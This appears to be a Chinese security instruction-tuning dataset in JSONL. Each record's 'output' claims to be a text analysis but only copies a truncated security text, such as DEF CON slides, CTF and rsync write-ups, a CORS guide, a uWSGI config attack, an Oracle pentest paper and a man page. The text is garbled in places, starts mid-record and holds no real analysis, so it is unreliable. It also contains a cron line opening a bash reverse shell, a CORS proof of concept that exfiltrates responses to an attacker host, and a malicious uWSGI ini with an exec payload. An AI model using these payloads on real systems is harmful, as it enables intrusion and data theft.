Vulnerabili;es of the Cloud Easy Access Anonymity/Fraud Conten;on for resources Threats to the Cloud Provider Infrastructure Damage Fraudulent/ Nonpaying Clients Proven inability to address security Threats to the Client One compromised client of a mul;-tenant environment can affect others Users can be unaware that their data is compromised What are most cloud providers currently doing?  Providers are trea;ng cloud security as a tradi;onal hos;ng environment  Clients are given a virtual firewall with in-line IPS services  Providers frequently offer Vulnerability Assessment for free  Each clients virtual instance is independent  Clients are fending for themselves with no coordinated enterprise security Conven;onal Solu;on: IPS  Very difficult for providers to offer prepackaged IPS that works for all clients and wont block legi;mate traffic  Informa;on coming from an IPS is frequently incomplete (encryp;on, lack of end-point awareness)  In-line IPS has to work at line speeds, so very complex correla;ons arent possible Conven;onal So", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npstree === 以树状图的方式展现进程之间的派生关系 ## 补充说明 **pstree命令** 以树状图的方式展现进程之间的派生关系显示效果比较直观 ### 语法 ```shell pstree(选项) ``` ### 选项 ```shell -a显示每个程序的完整指令包含路径参数或是常驻服务的标示 -c不使用精简标示法 -G使用VT100终端机的列绘图字符 -h列出树状图时特别标明现在执行的程序 -H<程序识别码>此参数的效果和指定\"-h\"参数类似但特别标明指定的程序 -l采用长列格式显示树状图 -n用程序识别码排序预设是以程序名称来排序 -p显示程序识别码 -u显示用户名称 -U使用UTF-8列绘图字符 -V显示版本信息 ``` ### 实例 显示当前所有进程的进程号和进程id ```shell pstree -p ``` 显示所有进程的所有详细信息遇到相同的进程名可以压缩显示 ```shell pstree -a ``` 获取 SSH 会话的 PID ```shell pstree -p | grep ssh # |-sshd(1221)-+-sshd(2768)---bash(2770)-+-grep(2810) # | `-sshd(2807)---sshd(2808) ``` 从上方的输出中你可以看到 sshd 进程与分支的树形图sshd 的主进程是 sshd1221另两个分支分别为 sshd2768 和 sshd2807", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWe dont need no stinkin badges! Shawn Merdinger security researcher DEFCON 18 Hacking electronic door access controllers Outline  EDAC technology  Trends, landscape  Vendors  Architecture  EDAC real-world analysis  S2 Security NetBox  Research, exposure, vulnerabilities, attacks  Countermeasures & recommendations Learning outcomes  Awareness of security issues in EDAC systems  Major players, vendors, resellers  Pen-testing knowledge  Research and testing methods Q . About security of buildings around town.what was your response? ATTY GEN. RENO: Let's do something about it. Q. Is this a good thing that has happened? ATTY GEN. RENO: I think any time you expose vulnerabilities, it's a good thing. Department of Justice Weekly Media Briefing, 25 May 2000 When hackers put viruses on your home computer it's a nuisance; when they unlock doors at your facility it's a nightmare. John L. Moss, S2 Security CEO STAD, Volume14, Issue 1. 1 January, 2004 Choice quotations EDAC Technology Overview  Trend is towards IP from proprietary solution  Convergence of IP, Video  Adding other building systems (HVAC, elevators, alarms)  Cost savings, integration, increased capabilities  Most controllers use embedded Linux  Wide range of vendors in EDAC space S2 Security Honeywell HID Global Vertx Ingersoll-Rand Bosch Security Reach Systems Cisco Systems (Richards Zeta) Brivo DSX Access RS2 Technologies Synergistics EDAC Deployment  Often youll see  Managed by building facilities people  Stuck in a closet and forgotten  Long lifecycles of 5-10 years  Distanced from IT Security  Physical security is not your domain. Its ours.  Patching, upgrades, maintenance. What? Huh?  Policies regarding passwords, logging dont apply  3rd party local service contractor adds doors, hardware configuration EDAC Architecture S2 Security NetBox  Built by S2 Security  9000+ systems installed worldwide  Schools, hospitals, businesses, LEA facilities, etc.  Same box is sold under multiple brand names  Built by S2 Secu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Rsync未授权访问漏洞 ## 漏洞描述 `Rsync`是`Linux`下一款数据备份工具支持通过`rsync`协议`ssh`协议进行远程文件传输常被用于在内网进行源代码的分发及同步更新因此使用人群多为开发人员其中`rsync`协议默认监听`873`端口而一般开发人员安全意识薄弱的情况下如果目标开启了`rsync`服务并且没有配置`ACL`或访问密码我们将可以读写目标服务器文件 ## 环境搭建 rsyncd.conf ``` uid = root gid = root use chroot = no max connections = 4 syslog facility = local5 pid file = /var/run/rsyncd.pid log file = /var/log/rsyncd.log [src] path = / comment = src path read only = no ``` 启动rsync ``` rsync --no-detach --daemon --config /etc/rsyncd.conf ``` ## 漏洞利用 环境启动后我们用rsync命令访问之 ``` [root@localhost tmp]# rsync rsync://192.168.32.183:873/ src src path ``` 查看`src`目录 ``` [root@localhost tmp]# rsync rsync://192.168.32.183:873/ src src path You have new mail in /var/spool/mail/root [root@localhost tmp]# rsync rsync://192.168.32.183:873/src drwxr-xr-x 28 2022/07/26 03:45:11 . -rwxr-xr-x 0 2022/07/26 03:45:11 .dockerenv -rwxr-xr-x 101 2022/05/19 09:45:03 docker-entrypoint.sh drwxr-xr-x 6 2018/01/21 13:42:04 bin drwxr-xr-x 6 2017/07/13 09:01:05 boot drwxr-xr-x 6 2022/07/26 03:45:11 data drwxr-xr-x 340 2022/07/26 03:45:11 dev drwxr-xr-x 66 2022/07/26 03:45:11 etc drwxr-xr-x 6 2017/07/13 09:01:05 home drwxr-xr-x 21 2018/01/21 13:42:05 lib drwxr-xr-x 34 2017/10/08 20:00:00 lib64 drwxr-xr-x 6 2017/10/08 20:00:00 media drwxr-xr-x 6 2017/10/08 20:00:00 mnt drwxr-xr-x 6 2017/10/08 20:00:00 opt dr-xr-xr-x 0 2022/07/26 03:45:11 proc drwx------ 37 2017/10/08 20:00:00 root drwxr-xr-x 80 2022/07/26 03:48:12 run drwxr-xr-x 4,096 2017/10/08 20:00:00 sbin drwxr-xr-x 6 2017/10/08 20:00:00 srv dr-xr-xr-x 0 2022/07/25 22:41:55 sys drwxrwxrwt 6 2022/07/26 03:44:41 tmp drwxr-xr-x 42 2017/10/08 20:00:00 usr drwxr-xr-x 17 2017/10/08 20:00:00 var ``` 这是一个Linux根目录我们可以下载任意文件 ``` [root@localhost tmp]# rsync -av rsync://192.168.32.183:873/src/etc/passwd ./ receiving incremental file list passwd sent 43 bytes received 1,283 bytes 2,652.00 bytes/sec total size is 1,197 speedup is 0.90 ``` 或者写入定时计划 ``` echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/9999 0>&1' >> shell ``` ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Unknown - Outside Secret Base Category: Reversing ## Description > Youre still located behind the tree, but now you have a plan on how to get in. You have taken notice that the guards are changing every 45 minutes, and when they do that, you have a gap of about 30 seconds to sneak past and get into the main entrance. Its risky of course, but you have to give it a try. You run towards the entrance. The new guards have not come yet, but suddenly you hear voices closing in. You trip and fall in front of the main entrance. The voices are very close now, and you glimpse a coat that belongs to a guard behind the corner, but at the last moment you get up and enter! ...only to face another door, this one closed, with an electronic lock - this one brand new. The good news is that it seems you won't be bothered for some time, and whoever is entering or leaving most likely won't notice you if you stand really still next to the wall. You pull out your handy screwdriver, unscrew the panel next to it, and stare at the circuit board for a few seconds. It doesn't look bad, you can do it! You pull out your laptop, attach some wires, and dump the firmware in seconds. It looks fairly simple actually... > Challenge: Just another keypad (rev) > > You start to analyze the firmware, and uff, that's just a standard Linux. This does makes things easier (imagine having to reverse a custom 8051 RTOS on the spot!). You browse through the directories to find the lock controls, and spot both the right executable and THE SOURCE CODE! But wait... it's in Free Pascal?! Note: To make the final flag append \"CTF{\" prefix and \"}\" suffix to the keypad code you've got. E.g. if the code is 1234, the flag would be CTF{1234} ## Solution We receive the following Pascal program: ```pascal type DigitType = array[1..16] of SmallInt; function CheckKeyPadCode(code : DigitType) : Boolean; var digit : SmallInt; i : SmallInt; x, a, b, c, d : QWord; begin x := 0; i := 0; For digit In code Do Begin If (digit < 0) or", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CORS Misconfiguration > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials. ## Summary * [Tools](#tools) * [Prerequisites](#prerequisites) * [Exploitation](#exploitation) * [References](#references) ## Tools * [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) * [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner) * [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html) * [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors) ## Prerequisites * BURP HEADER> `Origin: https://evil.com` * VICTIM HEADER> `Access-Control-Allow-Credential: true` * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` ## Exploitation Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. ### Vulnerable Example: Origin Reflection #### Vulnerable Implementation ```powershell GET /endpoint HTTP/1.1 Host: victim.example.com Origin: https://evil.com Cookie: sessionid=... HTTP/1.1 200 OK Access-Control-Allow-Origin: https://evil.com Access-Control-Allow-Credentials: true {\"[private API key]\"} ``` #### Proof of concept This PoC requires that the respective JS script is hosted at `evil.com` ```js var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://victim.example.com/endpoint',true); req.withCredentials = true; req.send(); function reqListener() { location='//atttacker.net/log?key='+this.responseText; }; ``` or ```html <html> <body> <h2>CORS PoC</h2> <div id=\"demo\"> <", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n攻击内的另类式host碰撞实践指南 清川崎@滴滴SSTG 0x00.前 在当前的攻防实战当中想要突破标边界进入内的式无非有以下种式 1.RCE/RCI(远程代码执/远程命令注入) 2.VPN弱令 3.SSRF漏洞 4.SQLI 5.件上传 6.物理攻击/社钓 但是有种依靠期信息收集才能提升攻击成功率的式往往被忽略那就是host 碰撞 0x01.本质 host碰撞这种攻击式本质上是nginx配置不当容易产的安全问题 nginx般 于做外代理配置也比较便但是配置不当的时候会产些安全问题其中 包括各个也都出现过(这我就不点名是哪些互联了) 外部署服务 般正常的流程是下这样的: intra server -> proxy -> nginx 内的集群或机器不直接连接外部nginx做个proxy代理透出传递互联如果 nginx配置不当或者nignx default_server没有配置或者配置内那么内 业务将被透传出去 nginx 的default_server指令可以定义默认的 server 去处理些没有匹配 到server_name的请求如果没有显式定义则会选取第个定义的server作 为default_server 也就是说nginx如果没配置default_server,那么nginx会默认 找个a-z的域名进匹配的这个是nginx的默认规则如配 置default_server为内的业务那么nginx也会默认使 nginx批量载入配 置 conf 时会按 ascii 排序载入这就会以 server_a.conf server_b.conf server_c.conf 的顺序载入如果没有声明default_server的话那server_a会 作为默认的server去处理未绑定域名/ip 的请求. 0x02.现象 那么说清楚了本质原因我们来看看host碰撞的现象级表象 在攻防实战过程中 很多时候我们在做信息搜集的时候般会遇到两种无法利的情况 1.扫描出来的很多根域名的域名其绑定解析的ip响应多为Nginx 200 Welcome to Centosrouter 200401403404500503 2.很多域名解析到内ip17x.x.x.x10.x.x.x 这举些例 先看看ip相关的案例 再来看看关于域名的案例 0x03.实践 现在来说下怎么去实现host碰撞 3.1. 前期准备 先我们得有庞的外ip池内host池我们需要搭建些简易的soar 去实现这我推荐使灯塔ARL 灯塔ARL github项地址:https://github.com/TophantTechnology/ARL 它概这样 灯塔ARL可以便的管理标的资产信息它会利各种情报API充分收集标的相 关信息例如利fofadnsmqriskiq等api我们按照要求搭建好以后需要到 其中的域名监控域名管理的模块 登录以后新建个资产组 然后启域名监控 差不多等待周以上的时间灯塔平台会动收集并去重得到数量庞的ip池域 名池 但是信息收集到这还没有结束我们还需要通过其他途径收集 通过访问某些外系统中的jshtml源码中注释部分寻找内域名 通过github寻找内域名 很多员喜欢把公司内的些域名丢到github码云等代码托管平台觉得内 域名需要VPN或者公司WiFi才能访问其实这是给外部攻击者提供了攻击条件 把代码托管平台中的这些host信息收集起来与灯塔ARL中的内域名组合以后并去 重将得到个数量较的内域名池 抓包灯塔展示内域名的请求api得到json数据 灯塔ARL json数据的去重这我提供个的脚本 #!/usr/bin/python3 import json data1 = 填json数据 json_str = json.dumps(data1) list1 = [] list2 = [] data2 = json.loads(json_str) data2_len = len(data2['items']) for x in range(0,data2_len): data3 = data2['items'][x]['domain'] data3_len = len(data3) if data3_len != 0: for y in range(0,data3_len): list1.append(data3[y]) # print(data3[y]) else: list2.append(data3[0]) # print(data3[0]) list3 = list(set(list1 + list2)) list3_len = len(list3) for i in range(0,list3_len): print(list3[i]) 下是使效果 再组合github", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n王大寶, PK 虛擬機 - 惡意程式攻防的新戰場  講師簡介 王大寶, 小時候大家叫他王小寶,長大後就稱王大寶,目前隸 屬一神祕單位. 雖然佯稱興趣在看書與聽音樂, 但是其實晚 上都在打Game. 長期於系統最底層打滾,熟悉ASM,C/C++, 對於資安毫無任何興趣,也無經驗,純粹是被某壞人騙上台, 可以說是不可多得的素人講師!!  議程大綱 現今的 CPU 都支援虛擬化專用指令集, 讓 VM 獲得硬體的 支援. 在這個場次中,我們將詳細地介紹 Intel 的 VT指令集 與其 Hypervisor 運作的機制. 此外我們將並介紹在惡意軟 體研究領域中在 Hypervisor 模式下能有哪些應用,包含惡意 程式技術與偵防分析的應用. 最後我們將介紹自行開發能在 Hypervisor 模式下運作的 Malware POC, 而且是無法被目 前防毒與防護系統偵測到! Agenda  VMM on x86  Hardware assisted architecture  VMM software implementing  Security & VMM What is VMM  Has full control over the platform  A thin layer between the physical hardware and virtualized environment  Be able to retain selective control from guest software  The real world 現實是殘酷的, 從VM中醒過來不一定是好事  :P What is VMM (conti.) Guest OS 1 Guest OS 2 VMM Physical Processor Types of Hypervisors Intel VT-x  Introduced by Intel  Includes a new set of instructions  Totally isolated environments for each guest  Solved many problems which were caused by guest OS executing at the same level of host OS  Provides better performance than byte code emulation Keywords  VMM runs at VMX root operation  Guest software runs at VMX non-root operation  Transition from VMM to guest software is called VM entry  Transition from guest software to VMM is called VM exit VMX root operation  Check CPU capabilities mov eax, 1 cpuid test ecx, 20h VMX  Virtual Machine Extensions 5 VMX root operation (conti.)  Prepare a non-pageable memory (VMXON Region)  storage of host context  aligned to 4KB  in MTRR range  Write Back (type 6)  size = MSR#480 [43:32]  rev_id = MSR#480 [31:0] 31 0 rev_id 43 VMXON Region Size 32 VMX root operation (conti.)  Enable VMXE bit (bit13) in CR4 mov eax, cr4 or eax, Bit13 mov cr4, eax 13 VMXE  Virtual Machine Extensions Enabled VMX root operation (conti.)  VMXON instruction vmxon phymem_vmxon_region  Hello, real world VMX non-root operation  Prepare a non-pageable memory (VMCS)  storage of guest software states  aligned to 4KB  in MTRR range  Write Back (type 6)  size = MSR#480 [43:32] ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPaul Marrapese <paul@redprocyon.com> DEF CON 28 Abusing P2P to Hack 3 Million Cameras What is this talk?  Overview of \"convenience\" feature found in millions of IoT devices  P2P is found in cameras, baby monitors, smart doorbells, DVRs, NASes, alarm systems  Hundreds of different brands impacted (supply chain issue)  How P2P exposes devices to the world  Devices are instantly accessible, even with NAT/firewalls  Obscure architecture and protocol (these devices aren't on Shodan!)  How P2P can be abused to remotely attack devices  Stealing creds with over-the-Internet MITM attacks  Exploiting devices behind firewalls to get root shells $ whoami  Paul Marrapese (OSCP)  San Jose, CA  @PaulMarrapese / paul@redprocyon.com  h=ps://hacked.camera  Red team at a large enterprise cloud company (opinions expressed are solely my own)  Reverse engineering, music producEon, photography All good things start with cats. Cheap cams galore Cheap cams galore Shady cams galore! Shady cams galore! What is peer-to-peer (P2P)?  In the context of IoT, a convenience feature for connectivity  Plug and play: users can instantly connect to devices from anywhere  Eliminates technical barriers barriers for non-technical users  No port forwarding required  No dynamic DNS or remembering IP addresses required  No UPnP required (P2P is not UPnP)  Automatically accepts connections, even with NAT/firewall restrictions  Your cheap camera's gaping security holes are now open to the world. Good luck.  Who provides P2P?  Several different providers of P2P soluEons in the industry  Largest is probably ThroughTek (TUTK)'s Kalay plaWorm (> 66m devices1)  This talk will focus on 2 in parEcular:  CS2 Network P2P (> 50m devices2)  Libs: PPPP_API, PPCS_API, libPPPP_API, libPPCS_API  Shenzhen Yunni iLnkP2P (>3.6m devices)  FuncEonally-idenEcal clone of CS2 P2P (even has compaEble API)  Libs: libxqun, libXQP2P_API, libobject, PPPP_API 1: https://www.throughtek.com/kalay_structure.html 2: http://cs2-network.cn/iot/ab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding a Real Session Layer D.J. Capelis Defcon 16 Let's start at the beginning It's easier to end at the end when you start at the beginning What's a Session Layer? ISO 7 Layer Model (Designed by committee) 1  Physical Layer (e.g. Cat 6, Fiber, Air) 2  Data Link Layer (e.g. Ethernet, 802.11[abgns...], FDDI) 3  Network Layer (Most commonly IP) 4  Transport Layer (e.g. TCP, UDP and a bunch of others) 5  Session Layer (Mostly unused) 6  Presentation Layer (Usually made fun of) 7  Application Layer (Everything) So where's the session layer? It kinda went everywhere.... Encryption: SSL, SSH, IPSec (?) Authentication: Individual applications shouldn't be doing encryption See also: I want to use my SSH keys for everything and there's no good reason I shouldn't be able to! Tons of service specific stuff that got pushed into the application layer Generally each application is reimplementing some idea of a session independently. More Code. More Code. More Buggy Code. So let's get rid of it While we're here.... Why do application multiplexing in layer 4? I dunno Yoink Layer five'd Speaking of which... That's what we're calling this software. fived Short for: Layer Five Daemon Current Development Status: Don't actually run it Useful for demos only Here's what we're going to put into fived: Application Multiplexing Authentication Encryption Things that go away: Port Knocking Host Based Firewalls Vhosts Authentication (As much as possible) Port Numbers ... Really? Yes... really. No port numbers If TCP/UDP hadn't done them, we'd have had a real session layer 20 years ago. Okay, so... taking out port numbers, kind of a big deal Please do one of the following If you're not with me on this... shout an expletive If you're with me on this... loudly proclaim: Hmm... interesting Best thing about Defcon: Having hundreds of people swear at you. (If not at least a hundred of you swore, I'm disappointed in Defcon and standing on the stage looking a bit like an idiot right now) Back to the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n) (( ( ((( )()() Alibaba Security 1  Xiaolong Bai  Alibaba Security Engineer  Ph.D. graduated from Tsinghua University  Published papers on the top 4: S&P, Usenix Security, CCS, NDSS  Twitter, Weibo, Github: bxl1989  Min (Spark) Zheng  Alibaba Security Expert  Ph.D. graduated from The CUHK  Twitter@SparkZheng Weibo@spark Alibaba Security Self Introduction Agenda  Overview  Drivers in Kernel  Userland Perspective  New Vulns in Drivers on macOS  Two new vulnerabilities  New exploitation strategies  Privilege escalation on the latest macOS  Obstacles when analyzing Apple drivers  Ryuk: a new tool to analyze Apple drivers  Design  Effects  Implementation  Benefits Alibaba Security Overview  Every driver is a kernel extension (.kext) sharing the same space with the kernel  System daemon kextd is responsible for loading and unloading drivers  Location of driver binaries:  On macOS: /System/Library/Extensions  On iOS: integrated with kernel in kernelcache Alibaba Security Drivers in Kernel  Programmed in C or C++  Info.plist: configuration file in drivers for their property and usage Kernel libs used in the driver Class name to provide service to userspace Class name of the driver Alibaba Security Drivers in Kernel  Kernel APIs (KPI): APIs can be used by drivers to live in kernel  /System/Library/Frameworks/Kernel.framework/Resources/SupportedKPI s-all-archs.txt (on macOS)  Basic KPI Modules:  com.apple.kpi.iokit: For programming drivers, Apple provides an open- source framework called iokit, which includes basic driver classes  com.apple.kpi.libkern: a restricted c++ runtime lib in the kernel  excluded featuresexceptions, multiple inheritance, templates  an enhanced runtime typing system: every class has an OSMetaClass object which describes the classs name, size, parent class, etc. Alibaba Security Drivers in Kernel  A sample driver Header File Code File Alibaba Security Drivers in Kernel  A sample driver Header File Code File Parent of all drivers Declare Con/Destructor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\na 30,000 feet look at wi-fi, the freezing spot luiz effffn eduardo hello DefCon 17 before we start... DefCon 17 so, why freezing spots? DefCon 17 agenda motivation the old and the new the pieces of the puzzle DefCon 17 the experiment(s) next? disclaimer DefCon 17 motivation gts 12 the pieces of the puzzle DefCon 17 gts 12 gts 12 gts 12 the old school way DefCon 17 the new stuff DefCon 17 gts 12 so, I asked... DefCon 17 Hello Luiz, You have asked a great question! You have asked a great question! You have asked a great question! You have asked a great question! What has changed that internet is now available during flight is What has changed that internet is now available during flight is What has changed that internet is now available during flight is What has changed that internet is now available during flight is technology. With the ability to use Wi technology. With the ability to use Wi technology. With the ability to use Wi technology. With the ability to use Wi----Fi frequencies instead Fi frequencies instead Fi frequencies instead Fi frequencies instead of cellular frequencies this has been approved! The FAA still of cellular frequencies this has been approved! The FAA still of cellular frequencies this has been approved! The FAA still of cellular frequencies this has been approved! The FAA still has all voice communication prohibited. has all voice communication prohibited. has all voice communication prohibited. has all voice communication prohibited. If you would like more information on this please feel free to visit the links If you would like more information on this please feel free to visit the links If you would like more information on this please feel free to visit the links If you would like more information on this please feel free to visit the links below: below: below: below: http://www.aa.com/content/amrcorp/pressReleases/2008_08/20_ http://www.aa.com/content/amrcorp/pressReleases/2008_08/20_ http://www.aa.com/content/amrcorp/pressReleases/20", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# uWSGI configuration file uWSGI configuration files can include magic variables, placeholders and operators defined with a precise syntax. The @ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including exec - useful to read from a processs standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed: Example of malicious uwsgi.ini file: ```ini [uwsgi] ; read from a symbol foo = @(sym://uwsgi_funny_function) ; read from binary appended data bar = @(data://[REDACTED]) ; read from http test = @(http://[REDACTED]) ; read from a file descriptor content = @(fd://[REDACTED]) ; read from a process stdout body = @(exec://whoami) ; call a function returning a char * characters = @(call://uwsgi_func) ``` When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed. ## uWSGI lax parsing The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...). ## Thanks to * [A New Vector For Dirty Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOracle Penetration Testing Using the Metasploit Framework Chris Gates & Mario Ceballos Metasploit Project Abstract Over the years there have been tons of Oracle exploits, SQL Injection vulnerabilities, and post exploitation tricks and tools that had no order, methodology, or standardization, mainly just random .sql files. Additionally, none of the publicly available Pentest Frameworks have the ability to leverage built- in package SQL Injection vulnerabilities for privilege escalation, data extraction, or getting operating system access. In this whitepaper we will present an Oracle Pentesting Methodology and give you all the tools to break the \"unbreakable\" Oracle as Metasploit auxiliary modules. We've created your version and SID enumeration modules, account bruteforcing modules, ported all the public (and not so public) Oracle SQL Injection vulnerabilities into SQLI modules (with IDS evasion examples for 10g/11g), modules for OS interaction, and modules for automating some of our post exploitation tasks. The modules are currently only supported under Linux and OSX. Oracle Penetration Testing Methodology  Locate a system running Oracle.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USERNAME/PASS.  Privilege Escalation via SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks. Locating an Oracle System You will typically find most Oracle installations by performing port scanning in the target netblock. The Oracle listener default port is 1521 but can listen on an port generally in the 1521-1540 range. You can also discover oracle instances by scanning other common Oracle ports. Review http://www.red- database-security.com/whitepaper/oracle_default_ports.html for common Oracle ports. Generally running a service scan will NOT give you the Oracle TNS Listener version but updated fingerprints for new versions of Nmap may yield versions in some situations. cg@attack:~$ nmap -sV 192.168.0.100-105 -p 1521 Starting Nmap 4.85BETA8 ( http://nm", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH DU 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 du \\- 估计磁盘文件使用量 .SH 概述 \\fBdu\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,文件\\/\\fP]... .br \\fBdu\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,\\-\\-files0\\-from=F\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 计算每个文件的设备用量目录则取总用量 .PP 必选参数对长短选项同时适用 .TP \\fB\\-0\\fP, \\fB\\-\\-null\\fP 使每行输出以 NUL 字符结束不添加换行符 .TP \\fB\\-a\\fP, \\fB\\-\\-all\\fP 输出所有文件的磁盘用量不仅仅是目录 .TP \\fB\\-\\-apparent\\-size\\fP print apparent sizes rather than device usage; although the apparent size is usually smaller, it may be larger due to holes in ('sparse') files, internal fragmentation, indirect blocks, and the like .TP \\fB\\-B\\fP, \\fB\\-\\-block\\-size\\fP=\\fI\\,大小\\/\\fP 以指定大小为单位对块大小进行输出例如\\&'\\-BM' 以 1,048,576 字节为单位输出大小详情请参见下方的SIZE 格式部分 .TP \\fB\\-b\\fP, \\fB\\-\\-bytes\\fP 等效于 '\\-\\-apparent\\-size \\fB\\-\\-block\\-size\\fP=\\fI\\,1\\/\\fP' .TP \\fB\\-c\\fP, \\fB\\-\\-total\\fP 显示总计信息 .TP \\fB\\-D\\fP, \\fB\\-\\-dereference\\-args\\fP 只在符号链接显式在命令行列出时对其进行解引用 .TP \\fB\\-d\\fP, \\fB\\-\\-max\\-depth\\fP=\\fI\\,N\\/\\fP 仅当目录或在 \\fB\\-\\-all\\fP 选项启用时包括文件层级不高于命令行参数指定的 N 层时输出对应目录或文件的对应大小\\fB\\-\\-max\\-depth\\fP=\\fI\\,0\\/\\fP 等效于 \\fB\\-\\-summarize\\fP .TP \\fB\\-\\-files0\\-from\\fP=\\fI\\,F\\/\\fP 统计文件 F 中的以 NUL 空字符分隔的文件名所对应的各个文件的设备使用量如果 F 是 \"\\-\"则从标准输入读取文件名 .TP \\fB\\-H\\fP 和 \\fB\\-\\-dereference\\-args\\fP\\fB\\-D\\fP等效 .TP \\fB\\-h\\fP, \\fB\\-\\-human\\-readable\\fP 以人类可读的格式输出大小例如1K 234M 2G .TP \\fB\\-\\-inodes\\fP 列出 inode 使用信息而非块使用信息 .TP \\fB\\-k\\fP 等效于 \\fB\\-\\-block\\-size\\fP=\\fI\\,1K\\/\\fP .TP \\fB\\-L\\fP, \\fB\\-\\-dereference\\fP 解引用所有符号链接 .TP \\fB\\-l\\fP, \\fB\\-\\-count\\-links\\fP 如果是硬连接则重复计算其尺寸 .TP \\fB\\-m\\fP 等效于 \\fB\\-\\-block\\-size\\fP=\\fI\\,1M\\/\\fP .TP \\fB\\-P\\fP, \\fB\\-\\-no\\-dereference\\fP 不跟随任何符号链接默认行为 .TP \\fB\\-S\\fP, \\fB\\-\\-separate\\-dirs\\fP 不包括子目录的占用量 .TP \\fB\\-\\-si\\fP 类似 \\-h但使用 1000 的倍数而非 1024 .TP \\fB\\-s\\fP, \\fB\\-\\-summarize", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMd Sohail Ahmad Md Sohail Ahmad Prabhash Prabhash Dhyani Dhyani AirTight Networks AirTight Networks www.airtightnetworks.com www.airtightnetworks.com Wi-Fish Finder: Who will bite the bait? There is >50 % chance that your laptop will!  AirTight Networks 2009 Submitted to DEFCON 17 About the Speaker Last year brought to you Autoimmunity Disorder in Wireless LANs at Defcon 16 http://www.defcon.org/html/defcon-16/dc-16- speakers.html#Ahmad The year before served you Caffe Latte at Toorcon 9 http://www.toorcon.org/2007/event.php?id=25  AirTight Networks 2009 Submitted to DEFCON 17 What Motivated This Presentation A lot has been written and said about dangers of using OPEN and WEP based WiFi networks Yet, level of awareness about WiFi vulnerabilities is still very low. A recent study by AirTight Networks in April 2009 http://www.airtightnetworks.com/home/resources/knowledge-center/financial- districts-scanning-report.html 56 % Clients were found to be probing for one or more SSIDs 13 % Clients were found probing for OPEN ad hoc networks Most users are vulnerable, yet they are unaware  AirTight Networks 2009 Submitted to DEFCON 17 Perhaps Showing Them a Mirror Will Help Wi-Fish Finder is a tool for 1. Discovering active WiFi clients 2. Finding networks they are probing for 3. Finding security settings of the probed network 1,2 has been done before Whats cool? --- Step 3 What needs attention?  clients which only connect to WPA, WPA2 networks can also be vulnerable!  AirTight Networks 2009 Submitted to DEFCON 17 Network Name Leakage from WiFi Cards WiFi enabled roaming clients normally leak the name of the networks they have been connecting to in the past Some of these networks could be Open or WEP and leaves client vulnerable to Honeypot style attacks  AirTight Networks 2009 Submitted to DEFCON 17 Can Security Mode of Each Probed Network (OPEN, WEP, WPA or WPA2) be Determined? WiFi enabled laptop keeps memory of various WiFi networks it has connected to in the past If corr", "category": "text_analysis", "source": "security_papers"}
